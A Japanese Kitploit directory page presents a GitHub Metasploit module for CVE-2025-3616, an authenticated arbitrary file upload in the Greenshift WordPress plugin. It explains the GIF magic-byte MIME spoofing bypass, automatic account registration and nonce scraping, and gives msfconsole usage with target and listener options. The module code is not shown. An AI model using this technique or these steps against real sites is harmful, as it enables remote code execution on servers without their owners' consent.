Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2025-3616 — Metasploitモジュール: CVE-2025-3616を悪用し、Greenshift WordPressプラグインにおける任意のファイルアップロードを利用して、GIFマジックバイトを用いたMIMEタイプスプーフィングにより認証済みRCEを可能にします。 | Kitploit
ツール/GitHubGitHub/b4d-53ct0r/cve-2025-3616
エクスプロイトフレームワーク脆弱性分析ウェブアプリケーション悪用ペネトレーションテスト認証ペイロード開発
GitHubb4d-53ct0r/cve-2025-3616

CVE-2025-3616

Metasploitモジュール: CVE-2025-3616を悪用し、Greenshift WordPressプラグインにおける任意のファイルアップロードを利用して、GIFマジックバイトを用いたMIMEタイプスプーフィングにより認証済みRCEを可能にします。

リポジトリを見る
7ヶ月前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

Metasploit モジュール: Greenshift WordPress プラグイン任意ファイルアップロード (CVE-2025-3616)

このリポジトリには、Greenshift WordPress プラグイン (バージョン 11.4 から 11.4.5) の任意ファイルアップロードの脆弱性 CVE-2025-3616 を悪用するための Metasploit モジュールが含まれています。

このエクスプロイトにより、認証済みユーザー (Subscriber+) が任意のファイルをアップロードし、リモートコード実行 (RCE) に至ることができます。GIF マジックバイト (GIF89a;) を使用して MIME タイプを偽装することにより、プラグインのファイルタイプ検証を回避します。

機能

  • 認証処理: 既存の認証情報 (USERNAME/PASSWORD) を使用したログインをサポートします。
  • 自動登録: REGISTER オプションを用意しており、新しいユーザーを自動登録し、新しいセッションクッキーを使用して脆弱性を悪用できます (対象でユーザー登録が有効な場合に便利です)。
  • Nonce 抽出: 管理ダッシュボードから必要な wp_rest nonce を自動的にスクレイピングします。
  • セキュリティバイパス: PHP ペイロードの前に GIF マジックバイトを追加して、finfo_file() による検証をバイパスします。

インストール

  1. Metasploit Framework がインストールされていることを確認します。

  2. wp_greenshift_file_upload.rb をローカルモジュールディレクトリにコピーします:

    root@kitploit:~
    mkdir -p ~/.msf4/modules/exploits/unix/webapp/
    cp wp_greenshift_file_upload.rb ~/.msf4/modules/exploits/unix/webapp/
    
  3. msfconsole を起動し、モジュールをリロードします:

    root@kitploit:~
    msfconsole
    msf6 > reload_all
    

使用方法

1. 自動登録を使用する (推奨)

対象でユーザー登録が有効な場合、認証情報は必要ありません。

root@kitploit:~
use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER true
run

2. 既存の認証情報を使用する

有効なユーザー (Subscriber 以上) が既にいる場合:

root@kitploit:~
use exploit/unix/webapp/wp_greenshift_file_upload
set RHOSTS <TARGET_IP>
set LHOST <YOUR_IP>
set REGISTER false
set USERNAME <USER>
set PASSWORD <PASS>
run

オプション

免責事項

このモジュールは教育目的および許可されたペネトレーションテストのみを対象としています。事前の相互同意なしにターゲットを攻撃するためにこのコードを使用することは違法です。

ツールをダウンロード
オプション必須説明
RHOSTSはいターゲットアドレス
LHOSTはいリスンアドレス (あなたの IP)
REGISTERいいえtrue に設定すると新しいアカウントを自動登録します (デフォルト: false)
USERNAMEいいえWordPress ユーザー名 (REGISTER が false の場合に必要)
PASSWORDいいえWordPress パスワード (REGISTER が false の場合に必要)
EMAILいいえ登録用のメールアドレス (省略時は自動生成)